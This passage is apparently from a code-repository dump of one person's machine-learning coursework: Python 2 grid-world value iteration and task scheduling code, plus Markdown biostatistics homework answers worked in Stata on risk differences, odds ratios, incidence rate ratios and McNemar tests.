isAbsorbing(self, key):\r\n\t\treturn isinstance(self[key], AbsorbingValue)\r\n\r\n\tdef isImpasse(self, key):\r\n\t\treturn isinstance(self[key], Obstacle)\r\n\r\n\tdef value(self, key):\r\n\t\tv = self[key]\r\n\t\tif isinstance(v, AbsorbingValue):\r\n\t\t\treturn v.value\r\n\t\treturn v\r\n\r\n\tdef V(self, state, gamma=1.0):\r\n\t\treturn max([ (gamma * sum( ( o.p * self.value(o.state) ) \r\n\t\t\tfor o in a.outcomes(self, state)) ) \r\n\t\t\tfor a in self.actions]) + self.R(state)\t\r\n\r\n\tdef R(self, state):\r\n\t\tif self.isAbsorbing(state):\r\n\t\t\treturn self[state].value\r\n\t\treturn self.motionCost\r\n\r\n\tdef possible_moves(self, state):\r\n\t\tworld = self\r\n\t\tactions = world.actions\r\n\t\treturn [s for s in [a.move(world, state) for a in actions] if s != state]\r\n\r\n\tdef action_values(self, state):\r\n\t\tassert not self.isAbsorbing(state) \\\r\n\t\t\t\tand not self.isImpasse(state), \\\r\n\t\t\t\t'state is absorbing or impasse: ' + str(state)\r\n\t\treturn [(a, sum( [o.p * self.value(o.state) for o in a.outcomes(self,state)])) for a in self.actions]\r\n\r\n\tdef best_action(self, state):\r\n\t\tbest_action = None\r\n\t\tbest_value = None\r\n\t\tfor action, value in self.action_values(state):\r\n\t\t\tif best_action is None or value > best_value:\r\n\t\t\t\tbest_action, best_value = action, value\r\n\t\treturn (best_action, best_value)\r\n\r\n\tdef print_policy(self):\r\n\t\tdef formatValue(value, i, j):\r\n\t\t\tif isinstance(value, (Obstacle, AbsorbingValue)):\r\n\t\t\t\tv = str(value)\r\n\t\t\telse:\r\n\t\t\t\tv = str(self.best_action(State(i,j))[0])\r\n\t\t\treturn v\r\n\r\n\r\n\t\tprint self.formatGrid(formatValue)\r\n\r\n\r\n\tdef states_reachable_from(self,initial):\r\n\t\t\"\"\"Returns all of the states reachable from initial in the \r\n\t\t\tworld (using tree-search algorithm / breadth-first)\"\"\"\r\n\r\n\t\tassert not (self.isImpasse(initial) or self.isAbsorbing(initial)), \\\r\n\t\t\t\t'initial state is not occupyable: ' + initial\r\n\r\n\t\tfrontier = []\r\n\t\texplored = []\r\n\t\tfrontier.append(self.state(initial))\r\n\t\t\r\n\t\twhile frontier:\r\n\t\t\ts = self.state(frontier.pop(0))\r\n\t\t\tfor f in self.possible_moves(s):\r\n\t\t\t\tif not self.isAbsorbing(f) \\\r\n\t\t\t\t\t\tand f not in explored \\\r\n\t\t\t\t\t\tand f not in frontier:\r\n\t\t\t\t\tfrontier.append(f)\r\n\t\t\texplored.append(s)\r\n\t\treturn explored\r\n\t\r\n\tdef value_iter(self, initial, delta = 0):\r\n\t\t\"\"\" Performs the value iteration routine until convergence.\r\n\t\t\tThe delta parameter controls how little difference implies convergence\r\n\t\t\t(the default value is 0).\r\n\r\n\t\t\tThe initial parameter is the starting position (should be next to the goal)\r\n\t\t\"\"\"\r\n\t\tstates = self.states_reachable_from(initial)\r\n\r\n\t\titerations = 0\r\n\t\twhile True:\r\n\t\t\titerations += 1\r\n\t\t\tlast_val = self[initial]\r\n\t\t\tfor s in states:\r\n\t\t\t\tself[s] = self.V(s)\r\n\t\t\tif abs(self[initial] - last_val) <= delta:\r\n\t\t\t\tbreak # converged\r\n\t\treturn iterations\r\n\r\n\tdef randomize(world, p_goal=.01, p_pit=.01, p_block=.01):\r\n\t\t\"\"\" Randomize the world using the probabilities. \"\"\"\r\n\t\trows = world.numRows\r\n\t\tcols = world.numCols\r\n\r\n\t\ta = p_goal\r\n\t\tb = p_goal + p_pit\r\n\t\tc = p_goal + p_pit + p_block\r\n\r\n\t\tfor x in xrange(rows):\r\n\t\t\tfor y in xrange(cols):\r\n\t\t\t\tn = random.random()\r\n\t\t\t\ts = (x, y)\r\n\t\t\t\tif n >= 0 and n < a:\r\n\t\t\t\t\tworld[s] = GOAL \r\n\t\t\t\telif n >= a and n < b:\r\n\t\t\t\t\tworld[s] = TRAP \r\n\t\t\t\telif n >= b and n < c:\r\n\t\t\t\t\tworld[s] = BLOCK\r\n\t\t\t\telse:\r\n\t\t\t\t\tworld[s] = 0\r\n\r\n\tdef set_range(self, val, row_range, col_range):\r\n\t\t\"\"\" Make each (i,j) where i is in row_range and j is in col_range equal to val.\r\n\t\t\tFor example, set_range(BLOCK,xrange(0,5), xrange(3,6)) would make the squares\r\n\t\t\tin the ranges BLOCKs).\r\n\t\t\"\"\"\r\n\t\tfor i in row_range:\r\n\t\t\tfor j in col_range:\r\n\t\t\t\tself[(i,j)] = val\r\n\r\ndef grid_world():\r\n\t\"\"\" The Grid World from the video lectures:\r\n\t\t\r\n>>> w = grid_world()\r\n>>> w.value_iter('a3')\r\n28\r\n>>> print w\r\n 1 2 3 4 \r\n-----------------------------------\r\n a | 85 89 93 +100 \r\n b | 81 [___] 68 -100 \r\n c | 77 73 70 47 \r\n<BLANKLINE>\r\n\"\"\"\r\n\treturn World(numRows=3, numCols=4,\r\n\t\t\tdefaultValues=[('b2',BLOCK),('a4',GOAL),('b4',TRAP)])\r\n\r\n\r\n\r\ndef crazyWorld(rows=26, cols=26):\r\n\tworld = World(rows, cols)\r\n\tworld.randomize()\r\n\treturn world\r\n\r\ndef testIt():\r\n\tworld = grid_world()\r\n\tprint world\r\n\r\n\tc1 = world.state(2,0)\r\n\tprint c1\r\n\tprint World.NORTH.outcomes(world, c1)\r\n\r\n\tb3 = world.state(1,2)\r\n\tprint b3\r\n\tprint World.WEST.outcomes(world, b3)\r\n\r\n\ta3 = world.state('a3')\r\n\tprint \"a3 = \" + str(a3)\r\n\tprint \"outcomes for E from a3: \" + str(World.EAST.outcomes(world, a3))\r\n\tprint \"V(a3) = \" + str(world.V(a3))\r\n\tprint world\r\n\r\n\tworld[a3] = world.V(a3)\r\n\tprint world\r\n\r\n\tb3 = world.state('b',3)\r\n\tprint \"V(\" + str(b3) + \") = \" + str(world.V(b3))\r\n\r\n\tworld[b3] = world.V(b3)\r\n\tprint world\r\n\r\n\tprint \"Value iteration until convergence ...\"\r\n\tworld = grid_world()\r\n\titerations = world.value_iter('a3')\r\n\tprint \"Converged in {0} iterations\".format(iterations)\r\n\tprint world\r\n\r\n\tN1 = StochasticAction('N', [ (World.N, .8), (World.S, .2) ])\r\n\tS1 = StochasticAction('S', [ (World.S, .8), (World.N, .2) ])\r\n\tE1 = StochasticAction('E', [ (World.E, .8), (World.W, .2) ])\r\n\tW1 = StochasticAction('W', [ (World.W, .8), (World.E, .2) ])\r\n\r\n\tw = World(numRows=2,numCols=4,actions=[N1,S1,E1,W1],motionCost=-4,defaultValues=[('b4',GOAL),('b1',TRAP)])\r\n\tw.value_iter('a4')\r\n\tprint w\r\n\tw.print_policy()\t\r\n\r\nimport doctest\r\ndoctest.testmod()\r\n\r\n" }, { "alpha_fraction": 0.6977491974830627, "alphanum_fraction": 0.7170417904853821, "avg_line_length": 22.769229888916016, "blob_id": "d492057bdd5badcfe8c77313ae107022b6f8fb74", "content_id": "45c57f24713d7b4d475b8ee962b19e1d99ae25b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 106, "num_lines": 13, "path": "/CS373/Unit-1/unit-1_5.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\n# We have 5 different cells where each cell has the same probability that the robot might be in that cell.\n# So probabilities add up to 1\n# Quiz from x1 to x5\n# -> What is the probability of any of those x's?\np=[]\nn=5\nfor i in range(n):\n\tp.append(1)\n\nprint p\n\n\n" }, { "alpha_fraction": 0.7094358205795288, "alphanum_fraction": 0.7433848977088928, "avg_line_length": 49.07500076293945, "blob_id": "e8d3e5b29b485b3b8d078bd39ef68cbcdc63d4ef", "content_id": "9bc508d402940fe271b6df40f8dfaa872c8933ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2005, "license_type": "no_license", "max_line_length": 275, "num_lines": 40, "path": "/PH207x/excercises/Lesson7/Tutorial: Gender and Visiting the Doctor.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Gender and Visiting the Doctor #\n> Rather than examining the health disparities question of the relationship between poverty and doctor visits, let’s switch gears and look at the relationship between gender and visiting the doctor within the past 12 months. Use chis_healthdisparities.dta dataset. \n> \n> To answer these questions, you can use the cs command in Stata. (Note: make sure you don't get the order of the case and exposed variables mixed up if you work from the command-line in Stata). To use the cs command, we need for the exposed variable to be coded as 0 or 1. \n> \n> First, generate an indicator that is equal to 1 if a participant is female and 0 if the participant male. Note that gender is coded as 2 for females, 1 for males. To generate the new indicator, type:\n\n\n\tgen female = gender - 1\n\n\n#### 1. Estimate the risk difference for visiting the doctor in the past 12 months for self-reported female versus male study participants (using the female variable). Calculate risk difference using proportion in females minus proportion in males.####\n> Estimate of risk difference: **0.1888948** \n> \n> 95% Confidence Interval: **[0.1198812,0.2579083]**\n\n> I used:\n\n\tgen female = gender - 1\n\tcs doctor female, or woolf\n\n\n#### 2. Estimate the odds ratio for visiting the doctor in the past 12 months for self-reported female versus male study participants. ####\n> Estimate of odds ratio: **3.517964** \n> \n> 95% Confidence Interval: **[2.174543,5.691343]**\n\n> I used:\n\n\tgen female = gender - 1\n\tcs doctor female, or woolf\n\n\n#### 3. Examine your estimated risk difference and estimated odds ratio, and their respective confidence intervals. Do you reach the same conclusion about the association between gender and visiting the doctor using these two measures of association? ####\n> **Yes** \n> No\n\n\n#### 4. If you were writing a paper, would you present the risk difference or the odds ratio (please discuss on the boards below)? ####\n> I would use the risk difference!\n" }, { "alpha_fraction": 0.4899826943874359, "alphanum_fraction": 0.5629482865333557, "avg_line_length": 55.125, "blob_id": "e22722d2a82a16bae07b12be74e370bf1a443d29", "content_id": "9802949022f8a152d35a8b0822668860b64dffdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4053, "license_type": "no_license", "max_line_length": 339, "num_lines": 72, "path": "/PH207x/homework/nine/Obesity and Rate of Stroke.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Obesity and Rate of Stroke ##\n> In the Framingham dataset that can be downloaded from the course website, we would like to examine the association between obesity and the rate of stroke. Since people with hypertension may have a higher body mass index and they are also at greater risk of a stroke, you may be concerned about confounding by hypertension.\n\n#### 1. Use the Framingham dataset and Stata to calculate the incidence rate ratio of stroke comparing obese participants (bmi1>=30) to all other participants. The variable for incident stroke in this dataset is “stroke” and number of years a person was followed for stroke is recorded in the “timestrk” variable in the NHLBI dataset. ####\n> => **1.79188**\n\n```stata\n\tuse \"framingham_dataset.dta\", clear\n\n\tgen bmi4cat=.\n\treplace bmi4cat=0 if (bmi1<30)\n\treplace bmi4cat=01 if (bmi1>=30)\n\n\tir stroke bmi4cat timestrk\n```\n\n```stata\n | bmi4cat |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Stroke | 85 330 | 415\nTime [years] to | 11144.75 77530.79 | 88675.54\n-----------------+------------------------+------------\n | |\n Incidence rate | .0076269 .0042564 | .00468\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0033705 | .0016854 .0050557 \n Inc. rate ratio | 1.79188 | 1.394785 2.280687 (exact)\n Attr. frac. ex. | .441927 | .2830436 .5615356 (exact)\n Attr. frac. pop | .0905152 |\n +-------------------------------------------------\n (midp) Pr(k>=85) = 0.0000 (exact)\n (midp) 2*Pr(k>=85) = 0.0000 (exact)\n```\n\n\n#### 2. Using the Framingham dataset and Stata, what is the incidence rate ratio (round to two decimal points) of stroke among obese participants (bmi1>=30) compared to all other participants after adjusting for prevalent hypertension at visit 1 (prevhyp1)? ####\n> **Hint1:** Are you entering the correct number? You should have two to choose from, one you have already used and the other is the required adjusted value.\n> => **1.197284**\n\n```stata\n\tuse \"framingham_dataset.dta\", clear\n\n\tgen bmi4cat=.\n\treplace bmi4cat=0 if (bmi1<30)\n\treplace bmi4cat=01 if (bmi1>=30)\n\n\tir stroke bmi4cat timestrk, by(prevhyp1)\n```\n\n```stata\nPrevalent hypert | IRR [95% Conf. Interval] M-H Weight\n-----------------+-------------------------------------------------\n No | 1.484769 .8687724 2.403521 11.75885 (exact)\n Yes | 1.121565 .8335983 1.493098 44.64521 (exact)\n-----------------+-------------------------------------------------\n Crude | 1.79188 1.394785 2.280687 (exact)\n M-H combined | 1.197284 .939728 1.52543\n-------------------------------------------------------------------\n Test of homogeneity (M-H) chi2(1) = 0.99 Pr>chi2 = 0.3208\n```\n\n\n#### 3. Based on your results above, which option for reporting the association between obesity and stroke is best? ####\n> **Hint1:** In option B you give as an answer the *adjusted measure of association for all*, only one number. In option C, the answer is two different numbers, one for each strata. \n\n* A. The crude incidence rate ratio for the association between obesity and stroke \n* B. The incidence rate ratio for the association between obesity and stroke adjusted for prevalent hypertension using the Mantel-Haenszel formula.\n* C. The incidence rate ratio for the association between obesity and stroke stratified by prevalent hypertension (ie calculate two incidence rate ratios – one among those with prevalent hypertension and one among those without prevalent hypertension). \n* => **B or C**\n\n\n" }, { "alpha_fraction": 0.7788079380989075, "alphanum_fraction": 0.7801324725151062, "avg_line_length": 56.846153259277344, "blob_id": "73c7d2166e464fdebf281d149b3ada511c48b953", "content_id": "caedddfbc7a94ee8902a01b5e19eba4710660636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 757, "license_type": "no_license", "max_line_length": 339, "num_lines": 13, "path": "/PH207x/exam/exam_part3.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Study Design #\nSelect the most appropriate study design for each of the following questions. (Note: All study design options may not be used and each design option can be used more than once.\n\n####1. A study is done to examine the association between a mother’s education and risk of a congenital heart defect in her offspring. The investigator enrolls a group of mothers of babies with birth defects and a group of mothers of babies without birth defects. The mothers are then asked a series of questions about their education.####\n* Case series\n* Case-control study \n* Nested case-control study \n* Prospective cohort study \n* Retrospective cohort study \n* Randomized clinical trial \n* Cross-sectional study \n* Ecological study \n* Case cohort study \n\n\n" }, { "alpha_fraction": 0.6625387072563171, "alphanum_fraction": 0.6983144283294678, "avg_line_length": 58.91752624511719, "blob_id": "82850a21367b06e278e21a2f9f82afd373bea5a5", "content_id": "456ce1ff8a635abe952feaa675ffa4057d62f548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5814, "license_type": "no_license", "max_line_length": 621, "num_lines": 97, "path": "/PH207x/homework/seven/Inference for proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Inference for proportions #\n> According to Fergusson et al. (2012), acutely ill patients, including neonatal infants, often receive red blood cell transfusions. However, the consequences of the use of red blood cells that have been stored for prolonged periods on health outcomes in premature infants are not well understood. In a double-blinded, randomized controlled trial, the authors looked at health outcomes in neonatal infants who underwent red blood cell transfusions, comparing the standard protocol (transfusions of blood stored for prolonged periods) with fresh blood transfusions (transfusions of blood store for less than seven days). \n> \n> The authors examined five outcomes listed below, as well as a composite outcome, defined as at least one of the five outcomes. In this question, we focus primarily on the composite outcome. The results of the study are shown in the following table: \n\nOutcome | Standard Protocol | Fresh Blood\n--------------------------- | ----------------- | ------------\nNecrotizing enterocolitis | 15 | 15\nIntraventricular hemorrhae | 11 | 18\nRetinopathy of prematurity | 26 | 23\nBronchopulmonary dysplasia | 63 | 60\nDeath | 31 | 30\nComposite Outcome | 100 | 99\nTotal Sample Size | 189 | 188\n\n> A dataset hw7.dta is also available on this webpage, which contains individual-level data for the composite outcome and for the group assignment, if you would rather not use the \"immediate\" commands in Stata. \n\n\n#### 1. Construct a 95% confidence interval for the proportion of infants experiencing the composite outcome in the fresh red blood cell group, using the following methods: #### \n> **Hint1:** For lower CI exact and wilson i calculate using the dropdown menu confidence intervals, for upper CI i use the comand cii and i got it right, but i'm really sure that this can't be possible- please explain \n> **Hint2** A lot are having problems with the confidence intervals. When you get one right and the other wrong, it is probably because the values you gave Stata are wrong. There is an error allowance of 2% built in to the answers. So your \"correct\" answer was really wrong, but within 2% of being right. \nUsing cii you should have been correct, if you gave the right sample size and cell size. Looking at help cii: cii #obs #succ [, ciib_options] \nSo you want the number of observations, then the number of \"successes\". In this case success is the number that fall into the desire category of fresh composite. \nYou just enter the name of the required confidence interval as an option - don't include the brackets \n> **Hint3:** The question asks you to construct a 95% confidence interval for the proportion of infants experiencing the composite outcome in the group that received fresh red blood cell group. For this reason the variable should be the outcome. You are right, you need put the fresh variable in the by/if/in to be able to pick only the infants who received fresh blood. \n\n> Exact binomial: **[0.4526364,0.5997032]** \n\n> I used:\n\n\tci outcome if fresh==1, binomial\n\n\n> Wilson normal approximation: **[0.455408,0.5967184]**\n\n> I used:\n\n\tci outcome if fresh==1, binomial wilson\n\n#### 2. Is the normal approximation to the binomial appropriate in this setting? ####\n> Yes \n> No\n\n#### 3. Suppose you wanted to calculate a 95% confidence interval for infants experiencing intraventricular hemorrhage after receiving a fresh blood transfusion as well. Examine the table above. Is the Wilson confidence interval still appropriate? #### \n> **Hint1:** One of the answers is above 5 while the other is less than 5. Should we have both of them above 5 to say that Wilson confidence interval still appropriate? I got this answer wrong and really did upset me. *Both needs to be > 5:*\n> **Hint2:** Wilson can be used if np(the mean)>5, and n(1-p)>5. You don't need Stata here. To calculate p you use our formula: P = X(exposed)/N(total sample size) From the table n is known and x is known. \n\n\tcsi #a #b #c #d [, csi_options]\n\n> Yes \n> No\n\n\n#### 4. Estimate and construct a large-sample 95% confidence interval for the risk difference for experiencing the composite outcome for those with fresh blood versus the standard protocol blood. **Calculate the risk difference as the estimated proportion in the fresh blood group minus estimated proportion in the standard blood group.** #### \n\n\tcs outcome fresh\n\n\n> Estimate of risk difference: **-0.0025048**\n\n> 95% Confidence Interval: **[-0.1032915,0.0982819]**\n\n\n#### 5. Use a two-sample test of proportions to test whether there is a difference in the proportion of infants experiencing the composite outcome between fresh blood group and the standard protocol group at the alpha=0.05 level of significance. ####\n\n> Proportion (percent) \n\n\ttabulate fresh\n\n fresh | Freq. | Percent | Cum.\n----------- | ------------ | --------- | -----------\n 0 | 189 | 50.13 | 50.13\n 1 | 188 | 49.87 | 100.00\n Total | 377 | 100.00 |\n\n\n\tprtesti (fresh#proportion of fresh # Standart # proporiton of Standard) \n\tprtesti 188 0.4987 189 0.5013\n\n\n###### What is the value of the test statistic? ######\n> z = -0.0505\n\n##### What is the null distribution of the test statistic? ######\n> Standard normal distribution \n> Binomial distribution \n\n\n##### What is the p-value? ######\n> p-value is Pr(|Z| < |z|) = **0.9718**\n\n\tprtesti 99 .52659574 100 .52910053\n\n##### What is the conclusion? ######\n> => **No evidence that the risk difference is not equal to 0** \n> Evidence that the risk difference is greater than 0 \n> Evidence that the risk difference is less than 0 \n\n" }, { "alpha_fraction": 0.6439446210861206, "alphanum_fraction": 0.6776816844940186, "avg_line_length": 53, "blob_id": "737d62b2ada435bcfb351d46f552f6a2546aa60a", "content_id": "e63e02ed7b22cdc8100911a939026046a10fc3d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5816, "license_type": "no_license", "max_line_length": 531, "num_lines": 107, "path": "/PH207x/excercises/Lesson7/McNemar Test.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# McNemar Test #\n> Paired Dichotomies \n> MI= Myocardial infarction \n> e.g. Pairs matched on age & sex:\n\nDiabetes | M.I. Yes | M.I. No | Total\n-------- | -------- | ------- | ------\nYes | 46 | 25 | 71\nNo | 98 | 119 | 217\nTotal | 144 | 144 | 288\n\n> So we have 144 pairs and we want to use McNemar's Test:\n\n | No M.I. - Diabetes | No M.I. - No Diabetes | Total\n------------------ | ------------------ | --------------------- | ------\nM.I. - Diabetes | 9 | 37 | 46\nM.I. - No Diabetes | 16 | 82 | 98\nTotal | 25 | 119 | 144\n\n## Chi-squared ##\n> Discordant entries: 37 & 16 \n> x²= SUM of all cells [ ( |obs-exp|**-1** )² / exp ] \n> **-1**: Stata ignores the correction factor, 1\n> \n> x²= ( |37-16|-1 )² / (37+16) \n> = 7.55 \n> \n> x²_(1,0.010)=6.63 \n> x²_(1,0.001)=10.83 \n> => **0.001<p<0.010** \n> \n> p < 0.05\n\n# Tutorial: Inference for Paired Data using McNemar’s Test #\n## Part 1 ##\n> Consider the following study from Dekkers et al. (2011) that compared two different screening tests for determining adrenal insufficiency. Adrenal insufficiency is a condition in which the adrenal glands do not produce adequate amounts of certain hormones. The screening test involves measuring a patient’s cortisol response after administration of an intravenous bolus of adrenocorticotropic hormone (ACTH). \n> \n> Currently, two doses of ACTH are used for diagnostic purposes in patients with suspected adrenal insufficiency: 1 μg and 250 μg (Dekkers et al. 2011). There is an ongoing debate about which dose should be used for the initial assessment of adrenal function (Dekkers et al. 2011). \n> \n> The goal of this study was to compare the cortisol response of the 1 μg and 250 μg ACTH test among patients with suspected adrenal insufficiency. Patients with cortisol concentrations of ≥550 nmol/l after ACTH stimulation (considered normal cortisol response) were classified as not having adrenal insufficiency. This was a retrospective cohort study whereby patients who received both the 1 μg and 250 μg ACTH test between January 2004 and December 2007 were included for analysis. The data can be found in the AI.dta dataset. \n> \n> Source: Dekkers OM, Timmermans JM, Smit JW, Romijn JA, Pereira AM. Comparison of the cortisol responses to testing with two doses of ACTH in patients with suspected adrenal insufficiency.Eur J Endocrinol 2011 Jan;164(1):83-7 \n\n | 250 μg Abnormal | 250 μg Abnormal \n------------- | --------------- | --------------- \n1 μg Abnormal | | \n1 μg Normal | | \n\n\n####1. Since this is paired data, we decide to use McNemar’s test. State the null and alternative hypothesis for McNemar’s test.####\n> **Null:** The proportion of patients classified as having adrenal insufficiency using the 1 μg test is the same as the proportion of patients classified as having adrenal insufficiency using the 250 μg test. \n> **Alternative:** Those proportions are not equal. \n> \n> Is this the same as testing that the proportion of patients classified as not having adrenal insufficiency using the 1 μg test is the same as the proportion of patients classified as not having adrenal insufficiency using the 250 μg test?\n\n\tuse \"AI.dta\", replace\n\ttabulate one two\n\tmcc one two\n\n> This test is based on the binomial distribution \n\n####Conclusion####\n> Since our p-value is greater than 0.05 we fail to reject the null hypothesis. Thus, we have no evidence that the proportion of patients classified as having adrenal insufficiency using the 1 μg test is different from the proportion of patients classified as having adrenal insufficiency using the 250 μg test.\n\n\n## Part II ##\n> Rather than analyzing the random sample of 500, we match those below poverty to someone above poverty in the sample of 500. \n> **mcc** - McNemar's test in Stata\n\n\tuse \"chis_matched.dta\", replace\n\n> doctor_0: above the line who goes to the doctor \n> doctor_1: below the line who goes to the doctor \n> \n> H_0: no assoc. \n> H_1: there is a association \n> \n> Dataset: \n> => poverty= 1 \n> => Age gender location\n\n\tmcc doctor_0 doctor_1\n\n> The Unexposed is interessting! \n> x² H_0~ x²_1 \n> We would use the Exact Value of McNemar, which depends on the small p-value \n> \n> Gain power by matching! \n\n\n# Summarizing the Results #\n> In this example, we have assumed that we have obtained a random sample of 500 California residents. (With observational survey data, nonresponse is always an issue, so we don’t know how random the sample actually is). \n> \n#### From the Pearson Chi-Square test, can we say that poverty causes individuals to go to the doctor less frequently over the past 12 months? (Please discuss why or why not on the discussion boards). ####\n> Yes \n> => **No**\n\n#### From the matched analysis, can we say that poverty causes individuals to go to the doctor less frequently over the past 12 months? (Please discuss why or why not on the discussion boards). ####\n> Yes \n> => **No**\n\n#### Could we get a better estimate of the effect of poverty on visiting the doctor in the past 12 months if we brought in more covariates/information about the individuals in the survey? (Please discuss why or why not on the discussion boards).#### \n> Not likely \n> => **Likely**\n\n# Some guidance #\nThe moral of the story is that association is not causation in observational studies, because observational studies lack treament randomization (you can't randomize people to poverty). You can bring in more individual covariate information to improve your analysis, which we will learn to do via logistic regression. \n\n" }, { "alpha_fraction": 0.2642924189567566, "alphanum_fraction": 0.3692595958709717, "avg_line_length": 26.230770111083984, "blob_id": "bb0e4a604476df57ffb0518e7e470365a1ab757e", "content_id": "038f66056f56995774974518f2a960976e79260b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 57, "num_lines": 39, "path": "/PH207x/excercises/Lesson7/Tutorial: Two-Sample Proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Two-Sample Proportions #\n> X_1 ~ Bin(n_1, p_1) H_0: p_0=p_1 \n> X_0 ~ Bin(n_0, p_0) H_A: p_0 != p_1 \n> \n> X_1 ~ N( μ_1, σ²) H_0: μ_1=μ_2 \n> X_0 ~ N( μ_0, σ²) H_A: μ_1 != μ_2 \n \n> **T-Distribution** \n> t= ( ̅x_1 - ̅x_2) / s*p*sqrt(1/n_1 + 1/n_2) \n> \n> ^p_1= x_1/n_1 \n> ^p_0= x_0/n_0 \n> \n> Z= ^p_1 - ^p_0 / sqrt( p(1-p) * ( 1/n_1 + 1/n_2 ) )\n> p= x_1 + x_2 / n_1 + n_2\n\n\n### Test in Stata ###\n> H_0: p_1=p_0 \n> H_A: p_1 != p_0 \n> alpha=0.05 \n> 95% \n\n\ttabulate poverty doctor\n\n> | Visited doctor in the| \n> Below the federal | past 12 months | \n> poverty level | Didn't go Went to d | Total \n> -------------------+----------------------+---------- \n> Above poverty line | 79 358 | 437 \n> Below poverty line | 19 44 | 63 \n> -------------------+----------------------+---------- \n> Total | 98 402 | 500 \n \n> p = (358 + 44) / (437 + 63)= 0.804 \n \n> **Compare Poverty line**\n> 63*0.084= 50.7 \n> 63*(1-0.084)= 12.3 \n\n\n\n" }, { "alpha_fraction": 0.49428483843803406, "alphanum_fraction": 0.5171455144882202, "avg_line_length": 20.60839080810547, "blob_id": "dbf0aecfb7625b36a203d71cc330200340834fb1", "content_id": "9fd3c7c26522f00471e850e3299916407cf6ed49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3237, "license_type": "no_license", "max_line_length": 168, "num_lines": 143, "path": "/AI-Class/Algorithms-Python/Sched.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"\r\nScheduling as covered in Unit 15-3\r\n\r\n>>> tn = TaskNetwork(['S',('a',30),('b',30),('c',10),('x',60),('y',15),('z',10),'F'], {'S':['a','x'], 'a':['b'], 'b':['c'], 'c':['F'], 'x':['y'], 'y':['z'], 'z':['F']})\r\n\r\n>>> tn.next_tasks('a')\r\n['b']\r\n\r\n>>> tn.prev_tasks('a')\r\nset(['S'])\r\n\r\n>>> tn.next_tasks('F')\r\nset([])\r\n\r\n>>> tn.next_tasks('x')\r\n['y']\r\n\r\n>>> tn.prev_tasks('F')\r\nset(['c', 'z'])\r\n\r\n>>> tn.duration('x')\r\n60\r\n\r\n>>> tn.duration('c')\r\n10\r\n\r\n>>> tn.duration('z')\r\n10\r\n\r\n>>> tn.duration('b')\r\n30\r\n\r\n>>> tn.schedule()\r\n[('a', 0, 15), ('c', 60, 75), ('b', 30, 45), ('F', 85, 85), ('S', 0, 0), ('y', 60, 60), ('x', 0, 0), ('z', 75, 75)]\r\n\r\n\"\"\"\r\n\r\nclass TaskNetwork(object):\r\n\tr\"\"\"A simple task network, e.g.,\r\n\r\n a - b - c\r\n / \\\r\n start finish\r\n\t\t \\ /\r\n\t\t d - e - f\r\n\t\r\n\t durations:\r\n\t\t\t\ta = 30 min\r\n\t\t\t\tb = 30 min\r\n\t\t\t\tc = 10 min\r\n\t\t\t\td = 60 min\r\n\t\t\t\te = 15 min\r\n\t\t\t\tf = 10 min\r\n\r\n\t\t\twith functions ES and LS, earliest start time\r\n\t\t\tand latest start time, respectively, given by:\r\n\r\n\t\t\tES(start) = 0\r\n\t\t\tES(B) = max a->b ES(A) + Duration(A)\r\n\t\t\tLS(finish) = ES(finish)\r\n\t\t\tLS(A) = min b<-a LS(B) - Duration(A)\r\n\r\n\t\t\tA schedule for the task network is defined\r\n\t\t\tas the set [ (x, ES(x), LS(x)) for all tasks x ]\r\n\t\"\"\"\r\n\tdef __init__(self,tasks,links):\r\n\t\t\"\"\"\r\n\t\t\ttasks\r\n\t\t\t\t[start, (task1, duration1), (task2, duration2), ... , (task3, duration3), finish]\r\n\t\t\tlinks\r\n\t\t\t\t{ start: [task, task, ...], task1:[task, task, ...] }\r\n\t\t\"\"\"\r\n\r\n\t\tduration_map = dict()\r\n\t\tsize = len(tasks)\r\n\t\tself.tasks = set()\r\n\t\tfor i in xrange(size):\r\n\t\t\tt = tasks[i]\r\n\t\t\tif i == 0:\r\n\t\t\t\tself.start = t\r\n\t\t\t\tself.tasks.add(t)\r\n\t\t\telif i == (size-1):\r\n\t\t\t\tself.finish = t\r\n\t\t\t\tself.tasks.add(t)\r\n\t\t\telse:\r\n\t\t\t\tlabel, duration = t\r\n\t\t\t\tassert label not in duration_map, 'duplicate task: ' + label\r\n\t\t\t\tduration_map[label] = duration\r\n\t\t\t\tself.tasks.add(label)\r\n\r\n\t\tself.duration_map = duration_map\r\n\r\n\t\tself.links = links\r\n\r\n\tdef __repr__(self):\r\n\t\treturn ''.join(['< ',self.__class__.__name__,' links=',repr(self.links),', duration_map=',repr(self.duration_map),', tasks=',repr(self.tasks),' >'])\r\n\r\n\tdef duration(self, a):\r\n\t\t\"\"\"the duration of task a\"\"\"\r\n\t\tif a == self.start or a == self.finish:\r\n\t\t\treturn 0\r\n\t\treturn self.duration_map[a]\r\n\r\n\tdef next_tasks(self, a):\r\n\t\t\"\"\"the tasks that immediately follow a\"\"\"\r\n\t\tif a in self.links:\r\n\t\t\treturn self.links[a]\r\n\t\treturn set()\r\n\r\n\tdef 